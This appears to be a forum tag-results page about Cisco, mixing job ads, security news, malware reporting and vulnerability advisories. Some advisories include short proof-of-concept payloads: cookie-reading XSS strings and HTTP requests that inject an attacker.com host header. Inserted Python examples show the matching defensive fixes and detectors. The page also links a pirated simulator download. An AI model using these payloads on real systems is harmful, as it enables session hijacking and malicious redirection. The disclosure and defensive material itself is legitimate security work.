Showing results for tags 'cisco'.

Found 15 results
  1. Career Chance for IT-Technicians in Germany / Austria!

     Our client - an international IT corporation with global presence - is a clear trendsetter in modern IT technologies with a very broad, diversified range of services in the field of Voice over IP Communication, Video Conferencing, Collaboration and Virtual Meeting Solutions serving the Top 500 companies and organisations on each market. Due to further expansion they are looking for a dedicated, skilled person as

     On-Site Support Engineer (m/w) Unified Communication

     In this position you will set up, optimize and operate Cisco UCC Solutions on-site with the customers and manage customer non-standard and specific requirements. Furthermore you will be in charge of support and troubleshooting, infrastructural changes and implementations, rectify incidents if necessary, set up configurations and Cisco appliances and supervise the UCC infrastructure.

     Your profile:
     • Network/IT Bachelor Degree
     • Working experience in IT / Communication Technology
     • Experience with Cisco UCC solutions from a technical point of view
     • Cisco CCNA / CCNP Know-How
     • Fluent in English, some command of German and the willingness to improve and to attend German language courses
     • Excellent organisational and problem-solving skills, self-motivated and innovative talents

     IT-Technicians should be open for relocation to Germany / Austria! For further information please contact us! Tel.: +43 1 / 908 1887-0 office@esone.eu
  2. Remote code execution for some, denial of service for the rest of us

     Cisco has issued a string of patches for 16 faults, including a fix for a possible remote code execution in its IOS and IOS XE routing software. The patches address a generous dollop of security conditions caused by faulty queued packets.

     One flaw, rated severity 8.3, allows attackers to gain remote code execution in IOS XE by sending a crafted packet that allows code to run on affected boxes. Attackers could also send crafted packets to trigger denial of service.

     "A vulnerability in the AppNav component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload and may allow arbitrary code execution on the affected system," Cisco says in its advisory. "The vulnerability is due to improper processing of crafted TCP packets. An attacker could exploit this vulnerability by sending a crafted TCP packet that needs to be processed by the AppNav component configured on an affected device. An exploit could allow the attacker to cause an affected device to reload or execute arbitrary code in the forwarding engine."

     Another fix addresses flaws that allow attackers to spoof Autonomic Networking Registration Authority responses thanks to lax message validation. "A successful exploit could allow an attacker to bootstrap a device into an untrusted autonomic domain, gaining limited command and control of the AN node, causing a denial of service condition and disrupting access to the legitimate autonomic domain," Cisco says. Further vulnerabilities coupled in that advisory lead to denial of service conditions.

     The Borg also closed off a medium-severity vulnerability (CVE-2015-0769) in the IOS XR carrier software, rated 5, which can be easily exploited by attackers sending a packet that would, thanks to IPv6 extension headers, trigger denial of service. It says this occurs because the headers are not typical of normal operation, and says there are no workarounds for the flaw, meaning affected systems will require the patch.

     "A vulnerability in the IP version 6 processing code of Cisco IOS XR Software for Cisco CRS-3 Carrier Routing System could allow an unauthenticated, remote attacker to trigger an ASIC scan of the Network Processor Unit and a reload of the line card processing an IPv6 packet," it says in an advisory. "The vulnerability is due to incorrect processing of an IPv6 packet carrying IPv6 extension headers that are valid but unlikely to be seen during normal operation. An attacker could exploit this vulnerability by sending such an IPv6 packet to an affected device that is configured to process IPv6 traffic."

     That exploit can cause a reload of the line card, triggering repeated denial of service through transit traffic or data destined for the device. Affected Cisco IOS XR versions include 4.0.1; 40.2; 4.0.3; 4.0.4; 4.1.0; 4.1.1; 4.1.2, and 4.2.0. IOS XR Release 4.2.1 and later are not affected.

     Source
  3. Document Title:
     Cisco (Newsroom) - Client Side Cross Site Scripting Vulnerability

     References (Source):
     http://www.vulnerability-lab.com/get_content.php?id=1464

     Release Date:
     2015-04-24

     Vulnerability Laboratory ID (VL-ID):
     1464

     Common Vulnerability Scoring System:
     2.5

     Product & Service Introduction:
     Cisco Systems, Inc. is an American multinational corporation headquartered in San Jose, California, that designs, manufactures, and sells networking equipment. The stock was added to the Dow Jones Industrial Average on June 8, 2009, and is also included in the S&P 500 Index, the Russell 1000 Index, NASDAQ-100 Index and the Russell 1000 Growth Stock Index. (Copy of the Homepage: http://en.wikipedia.org/wiki/Cisco_Systems )

     Abstract Advisory Information:
     The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Cisco Newsroom online service web-application.

     Vulnerability Disclosure Timeline:
     2015-04-24: Public Disclosure (Vulnerability Laboratory)

     Discovery Status:
     Published

     Affected Product(s):
     Cisco
     Product: Newsroom - Web Application (Online Service) 2015 Q1

     Exploitation Technique:
     Remote

     Severity Level:
     Medium

     Technical Details & Description:
     A non-persistent cross site scripting web vulnerability has been discovered in the official Cisco Newsroom online service web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin session data by client-side manipulated cross site requests.

     The vulnerability is located in the `articleId` value of the Cisco Newsroom service module. Remote attackers are able to inject their own script code into the vulnerable GET method request of the newsroom module. The attack vector of the vulnerability is located on the client side of the newsroom service web-application. The request method to inject the script code on the client side is `GET`. The injection point of the issue is the vulnerable `articleId` value in the newsroom, and the script code execution point is located in the exception-handling module page. The exception handling displays the input without secure encoding, which results in the client-side script code execution.

     The security risk of the non-persistent input validation web vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 3.4.

     Exploitation of the client-side cross site scripting web vulnerability requires low user interaction (click) and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules.

     Request Method(s):
     [+] GET

     Vulnerable Service(s):
     [+] Cisco Newsroom

     Vulnerable Module(s):
     [+] Newsroom

     Vulnerable Parameter(s):
     [+] articleId

     Affected Section(s):
     [+] Exception-handling (Cisco Newsroom Webserver)

     Proof of Concept (PoC):
     The vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

     PoC: Exception-Handling Vulnerability
     <div class="portlet-msg-error"> No Article exists with the articleId=" --><iframe src="x" onload="alert(document.cookie)">.</div>

     --- PoC Session Logs [GET] ---
     Host=newsroom.cisco.com
     User-Agent=Mozilla/5.0 (X11; Linux i686; rv:36.0) Gecko/20100101 Firefox/36.0
     Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language=en-US,en;q=0.5
     Accept-Encoding=gzip, deflate
     Connection=keep-alive

     Reference(s):
     http://newsroom.cisco.com

     Solution - Fix & Patch:
     The vulnerability has been fixed/patched by the Cisco developer team since 24th April 2015.

     Security Risk:
     The security risk of the client-side cross site scripting web vulnerability in the newsroom service is estimated as medium. (CVSS 2.5)

     Credits & Authors:
     Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]

     Disclaimer & Information:
     The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

     Source
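As an added defender-side example (not part of the advisory above and not Cisco's code), the following Python contrasts the reflection defect the advisory describes with its output-encoded form, using the error-message text quoted in the PoC. The template string, the constructed PoC value and the `reflects_markup` check are assumptions made for this example.

```python
import html
import re

# Hypothetical error-page template, modelled on the message the advisory's PoC quotes.
TEMPLATE = ('<div class="portlet-msg-error">'
            'No Article exists with the articleId="{value}"</div>')

# Constructed input in the shape of the advisory's PoC; it is test data, not a live request.
POC_VALUE = '" --><iframe src="x" onload="alert(document.cookie)">'

# Any tag other than the template's own <div>/</div> means user data became markup.
FOREIGN_TAG_RE = re.compile(r"<(?!/?div\b)[A-Za-z]")


def render_error_vulnerable(article_id: str) -> str:
    """Reflects the parameter verbatim: the defect the advisory describes."""
    return TEMPLATE.format(value=article_id)


def render_error_fixed(article_id: str) -> str:
    """HTML-encodes the reflected value (quotes included) so it is text, never markup."""
    return TEMPLATE.format(value=html.escape(article_id, quote=True))


def reflects_markup(page: str) -> bool:
    """Detection check: True when the rendered page contains a tag the template did not emit."""
    return FOREIGN_TAG_RE.search(page) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_error_vulnerable), ("fixed", render_error_fixed)):
        page = render(POC_VALUE)
        print(f"{name}: foreign markup present = {reflects_markup(page)}")
        print("   ", page)
```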
  4. Subject: Cisco UCSM username and password hashes sent via SYSLOG
     Impact: Information Disclosure / Privilege Elevation
     Vendor: Cisco
     Product: Cisco Unified Computing System Manager (UCSM)
     Notified: 2014.10.31
     Fixed: 2015.03.06 ( 2.2(3e) )
     Author: Tom Sellers ( tom at fadedcode.net )
     Date: 2015.03.21

     Description:
     Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 send local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster then each member will transmit the data.

     SYSLOG Example ( portions of password hash replaced with <!snip!> ):
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd

     Vulnerable environment(s):
     Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment, including Fabric Interconnects, B-Series blade servers and the related blade chassis. C-Series (non-blade) servers can also be managed. These solutions are deployed in high performance / high density compute solutions and allow for policy-based and rapid deployment of resources. They are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity.

     Software Versions: 1.3 - 2.2(1b)A
     Hardware: Cisco 6120 XP, 6296 UP
     SYSLOG Configuration:
     - Level: Information
     - Facility: Local7
     - Faults: Enabled
     - Audits: Enabled
     - Events: Disabled

     Risks:
     1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment, and this information represents an exposure.
     2. Authorized users with the 'Operations' role can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM.
     3. SYSLOG is transmitted in plain text.

     Submitter recommendations to vendor:
     1. Remove the username and password hash data from the SYSLOG output.
     2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system.
     3. Add support for TLS-wrapped SYSLOG output.

     Vendor response/resolution:
     After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development, where it was treated as a standard bug. Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than that it was in progress with an undetermined release date. On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text:
     ---
     Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours.
     ---
     For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed. Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match. The following documents remain available:

     Public URL for Defect: https://tools.cisco.com/quickview/bug/CSCur54705
     Bug Search (login required): https://tools.cisco.com/bugsearch/bug/CSCur54705
     Release notes for 2.2(3e): http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634

     Associated vendor IDs:
     PSIRT-1394165707
     CSCur54705

     Timeline:
     2014.10.30 Reported to psirt@cisco.com
     2014.11.04 Response from PSIRT, assigned PSIRT-1394165707
     2014.11.06 Follow up questions from Cisco, response provided same day
     2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705.
     2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status.
     2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time
     2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission
     2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc.
     2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission
     2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e)

     Reference:
     1 - http://tools.cisco.com/security/center/publicationListing.x
     2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640 ( CVE-2014-8009 )

     Source
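An added example, not from the advisory author or from Cisco: a small Python detector that scans syslog lines for the UCSM "checking user" message quoted above, flags every line that carries a crypt-style password hash, and can scrub the hash field before the line is forwarded to a wider log audience. The sample lines and hash strings are constructed, and the relay-host parsing assumes the `<relay prefix> : <message>` layout shown in the advisory's sample.

```python
import re
from dataclasses import dataclass
from typing import List

# Message format quoted in the advisory:
#   <relay timestamp> <relay host> : <device timestamp>: %USER-6-SYSTEM_MSG:
#   checking user:<name>,<hash or '!'>,<float>,<float> - securityd
CHECKING_USER_RE = re.compile(
    r"%USER-6-SYSTEM_MSG: checking user:(?P<user>[^,]+),(?P<secret>[^,]*),"
    r"(?P<f1>-?[0-9.]+),(?P<f2>-?[0-9.]+) - securityd"
)
# crypt(3)-style prefix "$<id>$"; "$1$" (MD5-crypt) is what the advisory's sample shows.
CRYPT_PREFIX_RE = re.compile(r"^\$(?P<id>[0-9a-z]+)\$")
# Markers that denote a locked or password-less account rather than a hash.
LOCKED_MARKERS = {"", "!", "!!", "*"}

# Constructed sample lines in the advisory's layout; the hashes are made-up strings.
SAMPLE_LINES = [
    "Oct 28 23:31:37 10.0.0.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:User1,$1$abcdefgh$0123456789abcdefghijkl,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 10.0.0.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:admin,$1$ijklmnop$zyxwvutsrqponmlkjihgfe,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 10.0.0.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:samdme,!,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:38 10.0.0.242 : 2014 Oct 28 23:49:16 CDT: %USER-6-SYSTEM_MSG: "
    "unrelated housekeeping message - securityd",
]


@dataclass
class HashLeak:
    source: str      # relay/device address taken from the syslog prefix
    user: str
    scheme: str      # crypt id, e.g. "1" for MD5-crypt, or "unknown"
    secret_len: int


def classify_secret(secret: str) -> str:
    """'' for a locked/empty marker, the crypt id for a hash, 'unknown' for anything else."""
    if secret in LOCKED_MARKERS:
        return ""
    m = CRYPT_PREFIX_RE.match(secret)
    return m.group("id") if m else "unknown"


def source_host(line: str) -> str:
    """The relay host is the last token before ' : ' in the advisory's line layout."""
    prefix = line.split(" : ", 1)[0]
    return prefix.rsplit(" ", 1)[-1]


def find_hash_leaks(lines: List[str]) -> List[HashLeak]:
    """Return one HashLeak per line that carries password-hash material for a UCSM account."""
    leaks = []
    for line in lines:
        m = CHECKING_USER_RE.search(line)
        if not m:
            continue
        scheme = classify_secret(m.group("secret"))
        if not scheme:
            continue  # '!' style marker: account locked, nothing crackable exposed
        leaks.append(HashLeak(source_host(line), m.group("user"), scheme, len(m.group("secret"))))
    return leaks


def redact_hashes(line: str) -> str:
    """Replace the hash field with a placeholder; lines without a hash pass through unchanged."""
    def _sub(m):
        if not classify_secret(m.group("secret")):
            return m.group(0)
        return m.group(0).replace(m.group("secret"), "<redacted>", 1)
    return CHECKING_USER_RE.sub(_sub, line)


if __name__ == "__main__":
    for leak in find_hash_leaks(SAMPLE_LINES):
        print(f"{leak.source}: hash for '{leak.user}' (crypt ${leak.scheme}$, "
              f"{leak.secret_len} chars) sent over syslog")
    print(redact_hashes(SAMPLE_LINES[0]))
```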
  5. Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week.

     The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.

     According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone.

     Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone.

     “A successful exploit could be used to conduct further attacks,” Cisco said. “To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory.

     Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users.

     The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems.

     Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor.

     Source
  6. Cisco on Friday shared details on what the company says is a new breed of Point-of-Sale (PoS) malware that is more sophisticated and much better designed than previously seen PoS threats.

     Dubbed “PoSeidon” by Cisco, the malware has some resemblance to ZeuS and uses better methods to find card data than BlackPoS, the malware family reportedly used in the 2013 attack against Target and against Home Depot in 2014.

     According to Cisco, the malware scrapes memory to search out number sequences that specifically match up with formats used by Visa, MasterCard, AMEX and Discover, and goes as far as using the Luhn algorithm to verify that credit or debit card numbers are valid.

     “PoSeidon was professionally written to be quick and evasive with new capabilities not seen in other PoS malware,” members of Cisco’s Security Solutions team wrote in a blog post. “PoSeidon can communicate directly with C&C servers, self-update to execute new code and has self-protection mechanisms guarding against reverse engineering.”

     Some components of PoSeidon are illustrated in a diagram created by Cisco:
     [Figure: PoSeidon PoS Malware Features]

     “At a high level, it starts with a Loader binary that upon being executed will first try to maintain persistence on the target machine in order to survive a possible system reboot,” Cisco’s team explained. “The Loader then contacts a command and control server, retrieving a URL which contains another binary to download and execute. The downloaded binary, FindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit card numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card numbers are encoded and sent to an exfiltration server.”

     The Keylogger component was potentially used to steal passwords and could have been the initial infection vector, Cisco said.

     Upon being run, the Loader checks to see if it’s being executed with one of these two file names: WinHost.exe or WinHost32.exe. If it is not, the malware will make sure that no Windows service is running with the name WinHost. Loader will copy itself to %SystemRoot%\System32\WinHost.exe, overwriting any file in that location that would happen to have the same name. Next, Loader will start a service named WinHost. According to Cisco, this method allows the threat to remain running in memory even if the current user logs off. If the Loader is not able to install itself as a service, it will try to find other instances of itself running in memory and terminate them.

     Once installed, the Loader attempts to communicate with one of the hardcoded C&C servers and associated IP addresses.

     Once captured, PoSeidon exfiltrates the payment card numbers and keylogger data to servers, after being XORed and base64 encoded. Most of the command and control servers are currently hosted on .ru domains, Cisco said. Some of the known domains used for data exfiltration servers, as well as other domains and IPs that could indicate a compromise, are listed in Cisco’s blog post.

     “PoSeidon is another in the growing number of Point-of-Sale malware targeting PoS systems that demonstrate the sophisticated techniques and approaches of malware authors,” Cisco’s Security Solutions team noted. “Attackers will continue to target PoS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families. Network administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and protection against advancing malware threats.”

     In its annual Global Threat Intel Report, security firm CrowdStrike noted that criminals have been increasingly turning to ready-to-use PoS malware kits in the cyber-underground. According to Adam Meyers, vice president of intelligence at CrowdStrike, the price of these kits varied depending on their complexity, with some going for tens of dollars and others costing in the hundreds or thousands. In its report, CrowdStrike explained that the explosion of PoS malware may be mitigated by the adoption of EMV standards (Europay, MasterCard and Visa) as well as the growth of payment options such as Google Wallet and Apple Pay.

     Other point of sale malware used in recent attacks include vSkimmer, Dexter, Backoff, LusyPOS and Dump Memory Grabber, among others. In December 2014, researchers at Trend Micro came across a sample of a new PoS malware called “Poslogr” which appeared to be under development.

     Source
  7. The Cisco Network Simulator, Router Simulator & Switch Simulator

     The Boson NetSim Network Simulator is an application that simulates Cisco Systems' networking hardware and software and is designed to aid the user in learning the Cisco IOS command structure. NetSim utilizes Boson's proprietary Network Simulator, Router Simulator® and EROUTER® software technologies, along with the Boson Virtual Packet Technology® engine, to create individual packets. These packets are routed and switched through the simulated network, allowing NetSim to build an appropriate virtual routing table and simulate true networking. Other simulation products on the market do not support this level of functionality.

     Source: NetSim Cisco Network Simulator & Router Simulator
     Download: GirlShare - Download Boson NetSim 8.0.rar
  8. Hi, I'm looking for a rockstar sysadmin with very good unix/networking skills who will also do ops. Our stack includes:
     - Machines running CoreOS, CentOS, rarely Ubuntu
     - Cisco-type equipment
     - Dozens of servers - we usually don't use VMs but containers (docker/rocket)
     - Worth mentioning that we work with a LOT of IPs.
     Thanks. Worth mentioning that the job is in Bucharest.
  9. Cisco Connect 2015. Is anyone else coming?
  10. Cisco Ironport AsyncOS Cross Site Scripting

      Vendor: Cisco
      Product webpage: http://www.cisco.com
      Affected version(s):
      Cisco Ironport ESA - AsyncOS 8.0.1-023
      Cisco Ironport WSA - AsyncOS 8.5.5-022
      Cisco Ironport SMA - AsyncOS 8.4.0-126
      Date: 24/02/2015
      Credits: Glafkos Charalambous
      CVE: CVE-2013-6780

      Disclosure Timeline:
      28-10-2014: Vendor Notification
      28-10-2014: Vendor Response/Feedback
      22-01-2015: Vendor Fix/Patch
      24-02-2015: Public Disclosure

      Description:
      Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation of user-supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0. An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter.

      XSS Payload:
      http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}//

      References:
      https://tools.cisco.com/bugsearch/bug/CSCur44409
      https://tools.cisco.com/bugsearch/bug/CSCur89626
      https://tools.cisco.com/bugsearch/bug/CSCur89624
      http://yuilibrary.com/support/20131111-vulnerability/
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780
      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780

      Source
11. Cisco Ironport AsyncOS HTTP Header Injection

Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
  Cisco Ironport ESA - AsyncOS 8.0.1-023
  Cisco Ironport WSA - AsyncOS 8.5.5-021
  Cisco Ironport SMA - AsyncOS 8.4.0-138
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-0624

Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
20-02-2015: Vendor Advisory Release
24-02-2015: Public Disclosure

Description:
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website.

PoC #1
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: ironport:8443:@[attacker.com]

PoC #2
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: [attacker.com]

PoC #3
GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Host: ironport:8443
X-Forwarded-Host: [attacker.com]

References:
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624

Source
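Added example, not part of the advisory and not Cisco's code: a reconstruction of the request-handling pattern that makes the three PoC headers above work (Host or X-Forwarded-Host copied into an absolute redirect URL), beside a hardened version that validates the host against an allow-list and only honours X-Forwarded-Host from a configured reverse proxy. The allow-list, ports, proxy address and request dictionaries are constructed assumptions.

```python
import re

# Constructed allow-list of names/ports under which the management UI is legitimately
# reached (hypothetical values; a real appliance would take them from its configuration).
ALLOWED_HOSTS = frozenset({"ironport", "ironport.example.com"})
ALLOWED_PORTS = frozenset({443, 8443})

# Strict "host[:port]" authority: no userinfo ('@'), brackets, slashes or whitespace.
HOST_RE = re.compile(r"^(?P<name>[a-z0-9][a-z0-9.-]*)(?::(?P<port>\d{1,5}))?$")


def build_redirect_vulnerable(headers, path):
    """Reconstruction of the flawed pattern (not Cisco's code): whichever of
    X-Forwarded-Host / Host the client sent is copied verbatim into an absolute
    Location URL, so the client chooses where the browser is sent."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    return f"https://{host}{path}"


def effective_host(headers, peer_ip, trusted_proxies=frozenset()):
    """Return the canonical 'host[:port]' to use, or None if the request must be
    rejected (HTTP 400). X-Forwarded-Host is honoured only when the TCP peer is a
    configured reverse proxy; from anyone else it is ignored entirely."""
    host = headers.get("Host", "")
    if peer_ip in trusted_proxies and "X-Forwarded-Host" in headers:
        host = headers["X-Forwarded-Host"]
    m = HOST_RE.match(host.strip().lower())
    if m is None or m.group("name") not in ALLOWED_HOSTS:
        return None
    if m.group("port") is not None and int(m.group("port")) not in ALLOWED_PORTS:
        return None
    return m.group(0)


def build_redirect_hardened(headers, peer_ip, path, trusted_proxies=frozenset()):
    """Redirect only to a validated host; None means 'reject, emit no Location'."""
    host = effective_host(headers, peer_ip, trusted_proxies)
    return None if host is None else f"https://{host}{path}"


# Constructed requests modelled on the advisory's three PoCs (relevant headers only).
POC_REQUESTS = {
    1: {"Host": "ironport:8443:@attacker.com"},                          # userinfo trick
    2: {"Host": "attacker.com"},                                         # Host replaced
    3: {"Host": "ironport:8443", "X-Forwarded-Host": "attacker.com"},    # forwarded host
}
PATH = "/network/wga_ip_interfaces"


def compare(peer_ip="203.0.113.9"):
    """Map PoC number -> (Location from the vulnerable builder, from the hardened one)."""
    return {n: (build_redirect_vulnerable(h, PATH),
                build_redirect_hardened(h, peer_ip, PATH))
            for n, h in POC_REQUESTS.items()}


if __name__ == "__main__":
    for n, (vuln, safe) in compare().items():
        print(f"PoC #{n}: vulnerable -> {vuln!r}; hardened -> {safe!r}")
```

For PoC #3 the hardened builder still redirects, but to the Host value rather than the untrusted X-Forwarded-Host; PoC #1 and #2 are rejected outright.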
12. I searched the forum and didn't find it posted, so I decided to post it (for those interested, of course).

Adversaries are committed to continually refining or developing new techniques that can evade detection and hide malicious activity. Meanwhile, the defenders—namely, security teams—must constantly improve their approach to protecting the organization and users from these increasingly sophisticated campaigns. Caught in the middle are the users. But now, it appears they not only are the targets, but also the complicit enablers of attacks.

The Cisco 2015 Annual Security Report, which presents the research, insights, and perspectives provided by Cisco® Security Research and other security experts within Cisco, explores the ongoing race between attackers and defenders, and how users are becoming ever-weaker links in the security chain.

Cybersecurity is a broad and complex topic that has a far-reaching impact on users, companies, governments, and other entities around the world. The Cisco 2015 Annual Security Report is divided into four areas of discussion. These sections, and the issues explored within them, may at first glance seem disparate, but closer examination reveals their interconnectedness:

Read more: https://www.cisco.com/web/offer/gist_ty2_asset/Cisco_2015_ASR.pdf
13. Download CISCO SECURITY REPORT 2015

Cisco has presented the newest edition of its IT security report, which reveals, among other things, that spam volumes grew in 2014 and that malware reaches company computers by "luring" employees into opening various dangerous links or installing dubious applications.

We do not treat cyber threats with the seriousness they require, said Dorin Pena, general manager of Cisco Romania, at the presentation of the study.

"We, as users, are primarily responsible for our own safety, and we can be used as a 'platform' for launching other attacks against others or even against ourselves," he says.

"Cyberspace is the new environment in which we live our lives. Unfortunately, from a security point of view, we do not treat it with the seriousness it requires," says Dorin Pena, Cisco's general manager for Romania.

He adds that in 2015 the individual user is the main target of attacks: "They are evaluated and bombarded until a breach is found and they give in. Unfortunately it is easy for them to give in, because many are not trained and are not even aware of the risk they expose themselves to when communicating on the internet."

Users need to be more careful about what they open on the internet.

"We, as users, are primarily responsible for our own safety, and we can be used as a 'platform' for launching other attacks against others or even against ourselves. Why? Because we expose ourselves to a series of risks and, for example, we accept messages from sources we do not know and do not understand. We access applications, we click on all sorts of banners that we do not understand and do not know what is behind, and these can be dangers in the cybersecurity area," says Dorin Pena, who also adds that we use too many old versions of applications and the potential for attackers is enormous.

